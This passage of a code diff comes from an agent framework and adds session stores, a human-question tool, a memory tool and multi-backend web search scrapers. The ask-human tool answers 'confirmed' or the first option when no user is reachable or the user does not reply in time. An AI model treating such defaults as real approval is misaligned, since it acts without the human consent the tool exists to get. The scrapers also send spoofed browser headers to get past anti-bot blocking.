key = self._session_key(session.session_id)
await redis.set(key, json.dumps(session.to_dict()), ex=self._ttl_seconds)
async def get_session(self, session_id: str) -> Session | None:
redis = await self._get_redis()
raw = await redis.get(self._session_key(session_id))
if raw is None:
return None
return Session.from_dict(json.loads(raw))
async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
redis = await self._get_redis()
key = self._session_key(session_id)
raw = await redis.get(key)
if raw is None:
return None
session = Session.from_dict(json.loads(raw))
session.status = status
session.updated_at = datetime.now(timezone.utc)
await redis.set(key, json.dumps(session.to_dict()), ex=self._ttl_seconds)
return session
async def delete_session(self, session_id: str) -> bool:
redis = await self._get_redis()
keys = [self._session_key(session_id), self._messages_key(session_id)]
deleted = await redis.delete(*keys)
return deleted > 0
async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
redis = await self._get_redis()
sessions: list[Session] = []
cursor = 0
while True:
cursor, keys = await redis.scan(cursor, match=f"{self.KEY_PREFIX}*", count=200)
# Filter out message list keys
session_keys = [k for k in keys if not k.endswith(self.MSG_SUFFIX)]
if session_keys:
values = await redis.mget(session_keys)
for raw in values:
if raw is None:
continue
session = Session.from_dict(json.loads(raw))
if agent_name is None or session.agent_name == agent_name:
sessions.append(session)
if cursor == 0:
break
sessions.sort(key=lambda s: s.updated_at, reverse=True)
return sessions[:limit]
async def append_message(self, message: Message) -> None:
redis = await self._get_redis()
key = self._messages_key(message.session_id)
await redis.rpush(key, json.dumps(message.to_dict()))
# Set TTL on message list to match session TTL
await redis.expire(key, self._ttl_seconds)
async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
redis = await self._get_redis()
key = self._messages_key(session_id)
# Use LRANGE for offset-based pagination
# Redis list indices: 0-based, -1 = last element
start = offset
if limit is not None:
end = offset + limit - 1
else:
end = -1
raw_list = await redis.lrange(key, start, end)
return [Message.from_dict(json.loads(raw)) for raw in raw_list]
async def count_messages(self, session_id: str) -> int:
redis = await self._get_redis()
return await redis.llen(self._messages_key(session_id))
async def health_check(self) -> bool:
try:
redis = await self._get_redis()
return await redis.ping()
except Exception:
return False
# Needed for from_dict deserialization
from datetime import datetime, timezone # noqa: E402
class FileSessionStore:
"""File-based session store — persists sessions to ~/.agentkit/sessions/.
Each session is stored as a JSON file containing both session metadata
and messages. Suitable for single-user GUI mode without Redis.
"""
def __init__(self, data_dir: str | None = None):
if data_dir is None:
data_dir = os.path.expanduser("~/.agentkit/sessions")
self._data_dir = data_dir
os.makedirs(self._data_dir, exist_ok=True)
def _session_path(self, session_id: str) -> str:
return os.path.join(self._data_dir, f"{session_id}.json")
def _read_session_file(self, session_id: str) -> dict | None:
path = self._session_path(session_id)
if not os.path.exists(path):
return None
with open(path, encoding="utf-8") as f:
return json.load(f)
def _write_session_file(self, session_id: str, data: dict) -> None:
path = self._session_path(session_id)
with open(path, "w", encoding="utf-8") as f:
json.dump(data, f, ensure_ascii=False, indent=2)
async def save_session(self, session: Session) -> None:
data = self._read_session_file(session.session_id) or {"messages": []}
data["session"] = session.to_dict()
data["session"]["updated_at"] = datetime.now(timezone.utc).isoformat()
self._write_session_file(session.session_id, data)
async def get_session(self, session_id: str) -> Session | None:
data = self._read_session_file(session_id)
if data is None:
return None
return Session.from_dict(data["session"])
async def update_session_status(self, session_id: str, status: SessionStatus) -> Session | None:
data = self._read_session_file(session_id)
if data is None:
return None
data["session"]["status"] = status.value
data["session"]["updated_at"] = datetime.now(timezone.utc).isoformat()
self._write_session_file(session_id, data)
return Session.from_dict(data["session"])
async def delete_session(self, session_id: str) -> bool:
path = self._session_path(session_id)
if os.path.exists(path):
os.remove(path)
return True
return False
async def list_sessions(self, agent_name: str | None = None, limit: int = 100) -> list[Session]:
sessions: list[Session] = []
for fname in os.listdir(self._data_dir):
if not fname.endswith(".json"):
continue
path = os.path.join(self._data_dir, fname)
try:
with open(path, encoding="utf-8") as f:
data = json.load(f)
session = Session.from_dict(data["session"])
if agent_name is None or session.agent_name == agent_name:
sessions.append(session)
except Exception:
continue
sessions.sort(key=lambda s: s.updated_at, reverse=True)
return sessions[:limit]
async def append_message(self, message: Message) -> None:
data = self._read_session_file(message.session_id)
if data is None:
data = {"session": {"session_id": message.session_id}, "messages": []}
data.setdefault("messages", []).append(message.to_dict())
# Update session timestamp
if "session" in data:
data["session"]["updated_at"] = datetime.now(timezone.utc).isoformat()
self._write_session_file(message.session_id, data)
async def get_messages(self, session_id: str, limit: int | None = None, offset: int = 0) -> list[Message]:
data = self._read_session_file(session_id)
if data is None:
return []
msgs = data.get("messages", [])[offset:]
if limit is not None:
msgs = msgs[:limit]
return [Message.from_dict(m) for m in msgs]
async def count_messages(self, session_id: str) -> int:
data = self._read_session_file(session_id)
if data is None:
return 0
return len(data.get("messages", []))
async def health_check(self) -> bool:
return os.path.isdir(self._data_dir)
def create_session_store(
backend: str = "memory",
redis_url: str = "redis://localhost:6379/0",
ttl_seconds: int = 86400,
data_dir: str | None = None,
) -> InMemorySessionStore | RedisSessionStore | FileSessionStore:
"""Factory: create a SessionStore backed by memory, file, or Redis.
- ``memory``: In-memory (lost on restart)
- ``file``: JSON files in ``~/.agentkit/sessions/`` (persistent, no deps)
- ``redis``: Redis-backed (production, requires Redis)
Falls back to InMemorySessionStore if Redis is unavailable.
"""
if backend == "file":
store = FileSessionStore(data_dir=data_dir)
logger.info(f"SessionStore backend: file ({store._data_dir})")
return store
if backend == "redis":
try:
import redis.asyncio as aioredis # noqa: F401
store = RedisSessionStore(redis_url=redis_url, ttl_seconds=ttl_seconds)
logger.info(f"SessionStore backend: redis")
return store
except Exception as exc:
logger.warning(f"Failed to initialise RedisSessionStore ({exc}), falling back to InMemorySessionStore")
store = InMemorySessionStore()
logger.info("SessionStore backend: memory")
return store

View File

@ -13,6 +13,9 @@ from agentkit.tools.shell import ShellTool
from agentkit.tools.terminal_session import TerminalSession, TerminalSessionManager from agentkit.tools.terminal_session import TerminalSession, TerminalSessionManager
from agentkit.tools.pty_session import PTYSession from agentkit.tools.pty_session import PTYSession
from agentkit.tools.output_parser import OutputParser, ParsedOutput, ErrorType from agentkit.tools.output_parser import OutputParser, ParsedOutput, ErrorType
from agentkit.tools.ask_human import AskHumanTool
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.web_search import WebSearchTool
# Conditional import: HeadroomRetrieveTool requires HeadroomCompressor # Conditional import: HeadroomRetrieveTool requires HeadroomCompressor
try: try:
@ -33,8 +36,11 @@ __all__ = [
"SchemaExtractTool", "SchemaExtractTool",
"SchemaGenerateTool", "SchemaGenerateTool",
"BaiduSearchTool", "BaiduSearchTool",
"HeadroomRetrieveTool", "AskHumanTool",
"MemoryTool",
"ShellTool", "ShellTool",
"WebSearchTool",
"HeadroomRetrieveTool",
"TerminalSession", "TerminalSession",
"TerminalSessionManager", "TerminalSessionManager",
"PTYSession", "PTYSession",

View File

@ -0,0 +1,119 @@
"""AskHumanTool — Human-in-the-Loop tool for Chat mode.
When registered in a Chat-mode Agent, this tool allows the ReAct loop
to pause and ask the user a question, then wait for a reply via the
WebSocket connection.
"""
from __future__ import annotations
import asyncio
import logging
import uuid
from typing import Any
from agentkit.tools.base import Tool
logger = logging.getLogger(__name__)
class AskHumanTool(Tool):
"""Tool that asks the human user a question and waits for a reply.
Only functional in Chat mode where a WebSocket connection exists.
In Task mode, this tool should not be registered.
Usage in ReAct loop:
The Agent calls this tool when it needs clarification or
a decision from the user. The question is pushed to the
client via WebSocket, and the tool blocks until the user
replies or a timeout expires.
"""
def __init__(self, timeout: float = 60.0):
super().__init__(
name="ask_human",
description="Ask the human user a question and wait for their reply. "
"Use this when you need clarification, a decision, or "
"confirmation from the user before proceeding.",
)
self._timeout = timeout
# Shared dict injected by the Chat WebSocket handler:
# request_id -> asyncio.Future
self._pending_replies: dict[str, asyncio.Future] | None = None
# Callback to push question to client
self._ask_callback: Any = None
def configure(
self,
pending_replies: dict[str, asyncio.Future] | None = None,
ask_callback: Any = None,
) -> None:
"""Configure the tool with WebSocket communication channels.
Args:
pending_replies: Dict mapping request_id to Future that will
be resolved when the user replies.
ask_callback: Async callable(request_id, question, options)
that pushes the question to the client.
"""
self._pending_replies = pending_replies
self._ask_callback = ask_callback
@property
def parameters(self) -> dict[str, Any]:
return {
"type": "object",
"properties": {
"question": {
"type": "string",
"description": "The question to ask the user",
},
"options": {
"type": "array",
"items": {"type": "string"},
"description": "Optional list of choices for the user",
},
},
"required": ["question"],
}
async def execute(self, **kwargs: Any) -> dict:
"""Ask the user a question and wait for their reply.
Args:
question: The question to ask.
options: Optional list of choices.
Returns:
Dict with "reply" key containing the user's response.
"""
question = kwargs.get("question", "")
options = kwargs.get("options")
if self._pending_replies is None or self._ask_callback is None:
# Not in Chat mode — return a default response
logger.warning("AskHumanTool called outside Chat mode, returning default response")
default = options[0] if options else "confirmed"
return {"reply": default}
request_id = str(uuid.uuid4())[:8]
# Create and register future BEFORE calling callback so the
# callback (or any concurrent task) can resolve it immediately.
loop = asyncio.get_event_loop()
future = loop.create_future()
self._pending_replies[request_id] = future
# Push question to client
await self._ask_callback(request_id, question, options)
try:
reply = await asyncio.wait_for(future, timeout=self._timeout)
return {"reply": str(reply)}
except asyncio.TimeoutError:
logger.warning(f"AskHumanTool timeout for request {request_id}")
default = options[0] if options else "timeout — no response received"
return {"reply": default}
finally:
self._pending_replies.pop(request_id, None)

View File

@ -158,15 +158,39 @@ class BaiduSearchTool(Tool):
"User-Agent": ( "User-Agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) " "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) " "AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/120.0.0.0 Safari/537.36" "Chrome/131.0.0.0 Safari/537.36"
), ),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Cache-Control": "max-age=0",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Upgrade-Insecure-Requests": "1",
}, },
) )
html = resp.text html = resp.text
# Check if we got a captcha page
if "验证" in html and len(html) < 5000:
logger.warning("Baidu returned captcha page, search unavailable")
return {
"error": "Baidu search blocked by captcha",
"results": [],
"total": 0,
"success": False,
}
# 简单解析搜索结果(基于百度搜索结果页 HTML 结构) # 简单解析搜索结果(基于百度搜索结果页 HTML 结构)
results = self._parse_baidu_html(html, max_results) results = self._parse_baidu_html(html, max_results)
if not results:
# Try alternative parsing
results = self._parse_baidu_html_alt(html, max_results)
return {"results": results, "total": len(results), "success": True} return {"results": results, "total": len(results), "success": True}
except Exception as e: except Exception as e:
@ -188,38 +212,111 @@ class BaiduSearchTool(Tool):
results: list[dict[str, str]] = [] results: list[dict[str, str]] = []
# 匹配百度搜索结果块 # 匹配百度搜索结果块 - multiple patterns for different Baidu page versions
# 百度搜索结果通常在 <div class="result c-container"> 中 # Pattern 1: <h3 class="t"> with href
pattern = re.compile( pattern1 = re.compile(
r'<h3[^>]*class="[^"]*t[^"]*"[^>]*>.*?href="([^"]*)"[^>]*>(.*?)</a>', r'<h3[^>]*class="[^"]*t[^"]*"[^>]*>.*?href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL, re.DOTALL,
) )
snippet_pattern = re.compile( # Pattern 2: <h3> with data-url or inside <div class="result">
pattern2 = re.compile(
r'<h3[^>]*>.*?<a[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
# Snippet patterns
snippet_pattern1 = re.compile(
r'<span[^>]*class="[^"]*content-right_[^"]*"[^>]*>(.*?)</span>',
re.DOTALL,
)
snippet_pattern2 = re.compile(
r'<div[^>]*class="[^"]*c-abstract[^"]*"[^>]*>(.*?)</div>',
re.DOTALL,
)
snippet_pattern3 = re.compile(
r'<span[^>]*class="[^"]*content-right_[^"]*"[^>]*>(.*?)</span>', r'<span[^>]*class="[^"]*content-right_[^"]*"[^>]*>(.*?)</span>',
re.DOTALL, re.DOTALL,
) )
# Try pattern 1 first
for match in pattern1.finditer(html):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if not title or len(title) < 2:
continue
# Skip Baidu internal links that aren't redirect links
if "baidu.com" in url and "baidu.com/link?" not in url:
continue
if not url.startswith("http") and "baidu.com/link?" not in url:
continue
snippet = ""
for sp in [snippet_pattern1, snippet_pattern2, snippet_pattern3]:
snippet_match = sp.search(html[match.end():match.end() + 2000])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
if snippet:
break
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300] if snippet else "",
})
# If pattern 1 found nothing, try pattern 2
if not results:
for match in pattern2.finditer(html):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if not title or len(title) < 2:
continue
if "baidu.com" in url and "baidu.com/link?" not in url:
continue
if not url.startswith("http") and "baidu.com/link?" not in url:
continue
snippet = ""
for sp in [snippet_pattern1, snippet_pattern2, snippet_pattern3]:
snippet_match = sp.search(html[match.end():match.end() + 2000])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
if snippet:
break
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300] if snippet else "",
})
return results
@staticmethod
def _parse_baidu_html_alt(html: str, max_results: int) -> list[dict[str, str]]:
"""Alternative Baidu HTML parser - broader pattern matching."""
import re
results: list[dict[str, str]] = []
# Generic pattern: any <a> tag with baidu.com/link redirect
pattern = re.compile(
r'<a[^>]*href="(https?://www\.baidu\.com/link\?[^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
for match in pattern.finditer(html): for match in pattern.finditer(html):
if len(results) >= max_results: if len(results) >= max_results:
break break
url = match.group(1) url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip() title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if title and len(title) > 2:
# 跳过百度内部链接 results.append({
if "baidu.com/link?" not in url and not url.startswith("http"): "title": title[:200],
continue "url": url,
"snippet": "",
# 尝试提取摘要 })
snippet = ""
snippet_match = snippet_pattern.search(html[match.end():match.end() + 2000])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
results.append({
"title": title,
"url": url,
"snippet": snippet[:200] if snippet else "",
})
return results return results

View File

@ -0,0 +1,117 @@
"""MemoryTool — Agent 可在对话中读写记忆的工具.
操作:
- add: 追加内容到指定 section
- replace: 替换 section 内的文本
- remove: 删除整个 section
- read: 读取文件内容
file 参数: soul | user | memory | daily
"""
from __future__ import annotations
from typing import Any
from agentkit.memory.profile import MemoryStore
from agentkit.tools.base import Tool
VALID_FILES = {"soul", "user", "memory", "daily"}
VALID_ACTIONS = {"add", "replace", "remove", "read"}
class MemoryTool(Tool):
"""Agent 可调用的记忆操作工具.
Agent 在对话中读写 SOUL/USER/MEMORY/DAILY 记忆文件
"""
def __init__(self, memory_store: MemoryStore):
super().__init__(
name="memory",
description="Read and write persistent memory files. Use to remember user preferences, project info, and notes across sessions.",
input_schema={
"type": "object",
"properties": {
"action": {
"type": "string",
"enum": list(VALID_ACTIONS),
"description": "Operation: add, replace, remove, read",
},
"file": {
"type": "string",
"enum": list(VALID_FILES),
"description": "Memory file: soul (agent identity), user (user profile), memory (work notes), daily (today's log)",
},
"section": {
"type": "string",
"description": "Section name within the file (e.g. '项目信息', '偏好')",
},
"content": {
"type": "string",
"description": "Content to add or new text for replace",
},
"old_text": {
"type": "string",
"description": "Text to find for replace action",
},
"new_text": {
"type": "string",
"description": "Replacement text for replace action",
},
},
"required": ["action", "file"],
},
)
self._store = memory_store
async def execute(self, **kwargs) -> dict[str, Any]:
action = kwargs.get("action", "")
file_key = kwargs.get("file", "")
# Validate
if file_key not in VALID_FILES:
return {"success": False, "error": f"Invalid file: {file_key}. Must be one of {VALID_FILES}"}
if action not in VALID_ACTIONS:
return {"success": False, "error": f"Unknown action: {action}. Must be one of {VALID_ACTIONS}"}
try:
mf = self._store.get_file(file_key)
if action == "read":
content = mf.read()
return {"success": True, "content": content}
elif action == "add":
section = kwargs.get("section", "")
content = kwargs.get("content", "")
if not section:
return {"success": False, "error": "section is required for add action"}
mf.add_section(section, content)
return {"success": True, "message": f"Added to {file_key}/{section}"}
elif action == "replace":
section = kwargs.get("section", "")
old_text = kwargs.get("old_text", "")
new_text = kwargs.get("new_text", "")
if not section:
return {"success": False, "error": "section is required for replace action"}
if not old_text:
return {"success": False, "error": "old_text is required for replace action"}
success = mf.replace_section(section, old_text, new_text)
if not success:
return {"success": False, "error": f"old_text not found in {file_key}/{section}"}
return {"success": True, "message": f"Replaced in {file_key}/{section}"}
elif action == "remove":
section = kwargs.get("section", "")
if not section:
return {"success": False, "error": "section is required for remove action"}
mf.remove_section(section)
return {"success": True, "message": f"Removed {file_key}/{section}"}
return {"success": False, "error": f"Unhandled action: {action}"}
except Exception as e:
return {"success": False, "error": str(e)}

View File

@ -0,0 +1,515 @@
"""WebSearchTool — 通用网页搜索工具。
支持多种搜索后端按优先级自动降级
1. Tavily API需要 API key质量最好
2. Serper API需要 API keyGoogle 搜索结果
3. DuckDuckGo Lite免费无需 API key降级方案
"""
import json
import logging
import re
import urllib.parse
from typing import Any
import httpx
from agentkit.tools.base import Tool
logger = logging.getLogger(__name__)
class WebSearchTool(Tool):
"""通用网页搜索工具。
支持三种后端按优先级降级
- Tavily API高质量 key
- Serper APIGoogle 结果 key
- DuckDuckGo Lite免费降级方案
"""
def __init__(
self,
name: str = "web_search",
description: str = "搜索互联网信息。返回搜索结果列表,包含标题、链接和摘要。",
input_schema: dict[str, Any] | None = None,
output_schema: dict[str, Any] | None = None,
version: str = "1.0.0",
tags: list[str] | None = None,
tavily_api_key: str | None = None,
serper_api_key: str | None = None,
default_max_results: int = 5,
):
super().__init__(
name=name,
description=description,
input_schema=input_schema or self._default_input_schema(),
output_schema=output_schema or self._default_output_schema(),
version=version,
tags=tags or ["search", "web"],
)
self._tavily_key = tavily_api_key
self._serper_key = serper_api_key
self._default_max_results = default_max_results
@staticmethod
def _default_input_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "搜索关键词",
},
"max_results": {
"type": "integer",
"description": "最大返回结果数(默认 5",
"default": 5,
},
},
"required": ["query"],
}
@staticmethod
def _default_output_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"results": {
"type": "array",
"items": {
"type": "object",
"properties": {
"title": {"type": "string"},
"url": {"type": "string"},
"snippet": {"type": "string"},
},
},
"description": "搜索结果列表",
},
"total": {"type": "integer", "description": "结果总数"},
"backend": {"type": "string", "description": "使用的搜索后端"},
"success": {"type": "boolean", "description": "是否成功"},
"error": {"type": "string", "description": "错误信息(仅失败时)"},
},
}
async def execute(self, **kwargs) -> dict:
"""执行网页搜索。"""
query = kwargs.get("query")
if not query:
return {"error": "query 参数是必需的", "results": [], "total": 0, "success": False}
max_results = kwargs.get("max_results", self._default_max_results)
# Try backends in priority order
if self._tavily_key:
result = await self._search_tavily(query, max_results)
if result.get("success"):
return result
logger.warning(f"Tavily search failed, falling back: {result.get('error')}")
if self._serper_key:
result = await self._search_serper(query, max_results)
if result.get("success"):
return result
logger.warning(f"Serper search failed, falling back: {result.get('error')}")
# Fallback: DuckDuckGo
return await self._search_duckduckgo(query, max_results)
async def _search_tavily(self, query: str, max_results: int) -> dict:
"""Tavily API search."""
try:
async with httpx.AsyncClient(timeout=15) as client:
resp = await client.post(
"https://api.tavily.com/search",
json={
"api_key": self._tavily_key,
"query": query,
"max_results": max_results,
"search_depth": "basic",
},
)
resp.raise_for_status()
data = resp.json()
results = []
for item in data.get("results", [])[:max_results]:
results.append({
"title": item.get("title", ""),
"url": item.get("url", ""),
"snippet": item.get("content", "")[:300],
})
return {"results": results, "total": len(results), "backend": "tavily", "success": True}
except Exception as e:
logger.error(f"Tavily search error: {e}")
return {"error": str(e), "results": [], "total": 0, "success": False}
async def _search_serper(self, query: str, max_results: int) -> dict:
"""Serper API (Google) search."""
try:
async with httpx.AsyncClient(timeout=15) as client:
resp = await client.post(
"https://google.serper.dev/search",
json={"q": query, "num": max_results},
headers={"X-API-KEY": self._serper_key},
)
resp.raise_for_status()
data = resp.json()
results = []
for item in data.get("organic", [])[:max_results]:
results.append({
"title": item.get("title", ""),
"url": item.get("link", ""),
"snippet": item.get("snippet", "")[:300],
})
return {"results": results, "total": len(results), "backend": "serper", "success": True}
except Exception as e:
logger.error(f"Serper search error: {e}")
return {"error": str(e), "results": [], "total": 0, "success": False}
async def _search_duckduckgo(self, query: str, max_results: int) -> dict:
"""DuckDuckGo search (free, no API key needed).
Strategy:
1. Try HTML search (may be blocked by anti-bot)
2. Try Instant Answer API with original query
3. Try Instant Answer API with translated English query (for Chinese queries)
4. Try Bing search as final fallback
"""
try:
# Try HTML search first (more results when available)
result = await self._search_duckduckgo_html(query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# Try Instant Answer API with original query
result = await self._search_duckduckgo_instant(query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# For Chinese queries, try translating key terms to English
if self._contains_cjk(query):
english_query = self._cjk_to_english_hint(query)
if english_query != query:
logger.info(f"Retrying DuckDuckGo with English query: {english_query}")
result = await self._search_duckduckgo_instant(english_query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# Final fallback: try Bing search
result = await self._search_bing(query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# Return whatever we have (may be empty)
return result
except Exception as e:
logger.error(f"DuckDuckGo search error: {e}")
return {
"error": f"Search unavailable: {e}",
"results": [],
"total": 0,
"backend": "duckduckgo",
"success": False,
}
@staticmethod
def _contains_cjk(text: str) -> bool:
"""Check if text contains CJK characters."""
for ch in text:
if '\u4e00' <= ch <= '\u9fff' or '\u3040' <= ch <= '\u309f' or '\u30a0' <= ch <= '\u30ff':
return True
return False
@staticmethod
def _cjk_to_english_hint(query: str) -> str:
"""Simple CJK-to-English keyword mapping for better DuckDuckGo results."""
# Common Chinese query patterns to English
mappings = {
"是什么": "definition meaning",
"什么意思": "meaning definition",
"怎么": "how to",
"为什么": "why",
"如何": "how to",
"搜索": "",
"查一下": "",
"帮我": "",
"": "",
}
result = query
for cn, en in mappings.items():
result = result.replace(cn, f" {en} ")
# Remove extra spaces
result = " ".join(result.split())
return result if result.strip() else query
async def _search_duckduckgo_html(self, query: str, max_results: int) -> dict:
"""DuckDuckGo HTML search with robust parsing."""
try:
encoded_query = urllib.parse.quote(query)
url = f"https://html.duckduckgo.com/html/?q={encoded_query}"
async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client:
resp = await client.get(
url,
headers={
"User-Agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/120.0.0.0 Safari/537.36"
),
},
)
html = resp.text
results = self._parse_duckduckgo_html(html, max_results)
# If no results from standard parsing, try alternative patterns
if not results:
results = self._parse_duckduckgo_html_alt(html, max_results)
return {"results": results, "total": len(results), "backend": "duckduckgo", "success": True}
except Exception as e:
logger.error(f"DuckDuckGo HTML search error: {e}")
return {"error": str(e), "results": [], "total": 0, "backend": "duckduckgo", "success": False}
async def _search_duckduckgo_instant(self, query: str, max_results: int) -> dict:
"""DuckDuckGo Instant Answer API — returns abstract/related topics."""
try:
encoded_query = urllib.parse.quote(query)
url = f"https://api.duckduckgo.com/?q={encoded_query}&format=json&no_html=1&skip_disambig=0"
async with httpx.AsyncClient(timeout=10) as client:
resp = await client.get(url)
resp.raise_for_status()
data = resp.json()
results = []
# Abstract (direct answer)
abstract = data.get("Abstract")
if abstract:
results.append({
"title": data.get("Heading", query),
"url": data.get("AbstractURL", ""),
"snippet": abstract[:300],
})
# Related topics
for topic in data.get("RelatedTopics", [])[:max_results]:
if len(results) >= max_results:
break
if isinstance(topic, dict) and "Text" in topic:
results.append({
"title": topic.get("Text", "")[:80],
"url": topic.get("FirstURL", ""),
"snippet": topic.get("Text", "")[:300],
})
# Infobox
infobox = data.get("Infobox")
if infobox and isinstance(infobox, dict):
content = infobox.get("content", [])
for item in content[:2]:
if len(results) >= max_results:
break
if isinstance(item, dict) and item.get("value"):
results.append({
"title": item.get("label", ""),
"url": "",
"snippet": str(item.get("value", ""))[:300],
})
return {"results": results, "total": len(results), "backend": "duckduckgo_instant", "success": True}
except Exception as e:
logger.error(f"DuckDuckGo Instant API error: {e}")
return {"error": str(e), "results": [], "total": 0, "backend": "duckduckgo_instant", "success": False}
async def _search_bing(self, query: str, max_results: int) -> dict:
"""Bing search as a reliable fallback (free, no API key needed).
Uses Bing's search page with proper headers to avoid blocking.
"""
try:
encoded_query = urllib.parse.quote(query)
url = f"https://www.bing.com/search?q={encoded_query}&count={max_results}"
async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client:
resp = await client.get(
url,
headers={
"User-Agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
},
)
html = resp.text
results = self._parse_bing_html(html, max_results)
return {"results": results, "total": len(results), "backend": "bing", "success": True}
except Exception as e:
logger.error(f"Bing search error: {e}")
return {"error": str(e), "results": [], "total": 0, "backend": "bing", "success": False}
@staticmethod
def _parse_bing_html(html: str, max_results: int) -> list[dict[str, str]]:
"""Parse Bing search results HTML."""
results: list[dict[str, str]] = []
# Bing uses <li class="b_algo"> for organic results
# Title: <h2><a href="...">title</a></h2>
# Snippet: <p class="b_lineclamp2"> or <div class="b_caption"><p>
algo_pattern = re.compile(
r'<li[^>]*class="b_algo"[^>]*>(.*?)</li>',
re.DOTALL,
)
link_pattern = re.compile(
r'<h2[^>]*>\s*<a[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<p[^>]*>(.*?)</p>',
re.DOTALL,
)
for algo_match in algo_pattern.finditer(html):
if len(results) >= max_results:
break
block = algo_match.group(1)
link_match = link_pattern.search(block)
if not link_match:
continue
url = link_match.group(1)
title = re.sub(r"<[^>]+>", "", link_match.group(2)).strip()
if not title or not url.startswith("http"):
continue
snippet = ""
snippet_match = snippet_pattern.search(block[link_match.end():])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
return results
@staticmethod
def _parse_duckduckgo_html(html: str, max_results: int) -> list[dict[str, str]]:
"""Parse DuckDuckGo HTML search results."""
results: list[dict[str, str]] = []
# Pattern for html.duckduckgo.com: <a class="result__a" href="...">title</a>
link_pattern = re.compile(
r'<a[^>]*class="result__a"[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<a[^>]*class="result__snippet"[^>]*>(.*?)</a>',
re.DOTALL,
)
links = list(link_pattern.finditer(html))
snippets = list(snippet_pattern.finditer(html))
for i, match in enumerate(links):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
# Skip ad/tracking links
if not url.startswith("http") or "duckduckgo.com" in url:
continue
snippet = ""
if i < len(snippets):
snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
return results
@staticmethod
def _parse_duckduckgo_html_alt(html: str, max_results: int) -> list[dict[str, str]]:
"""Alternative DuckDuckGo HTML parser for lite/html variants."""
results: list[dict[str, str]] = []
# Pattern for lite.duckduckgo.com
link_pattern = re.compile(
r'<a[^>]*class="result-link"[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<td[^>]*class="result-snippet"[^>]*>(.*?)</td>',
re.DOTALL,
)
links = list(link_pattern.finditer(html))
snippets = list(snippet_pattern.finditer(html))
for i, match in enumerate(links):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if not url.startswith("http") or "duckduckgo.com" in url:
continue
snippet = ""
if i < len(snippets):
snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
# If still no results, try generic <a> with href containing external URLs
if not results:
generic_pattern = re.compile(
r'<a[^>]*href="(https?://(?!duckduckgo\.com)[^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
for match in generic_pattern.finditer(html):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if title and len(title) > 5:
results.append({
"title": title[:200],
"url": url,
"snippet": "",
})
return results

View File

@ -0,0 +1,236 @@
"""Integration tests for Chat + Adaptive + Multi-Agent features (U8).
End-to-end tests that verify the new Phase 8 capabilities work together:
- Chat mode with session management
- Adaptive pipeline execution with reflection
- Multi-Agent communication via MessageBus
"""
import asyncio
import pytest
from datetime import datetime, timezone
from unittest.mock import AsyncMock, MagicMock
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.bus.message import AgentMessage
from agentkit.core.orchestrator import Orchestrator, OrchestratorConfig
from agentkit.core.protocol import TaskMessage, TaskStatus
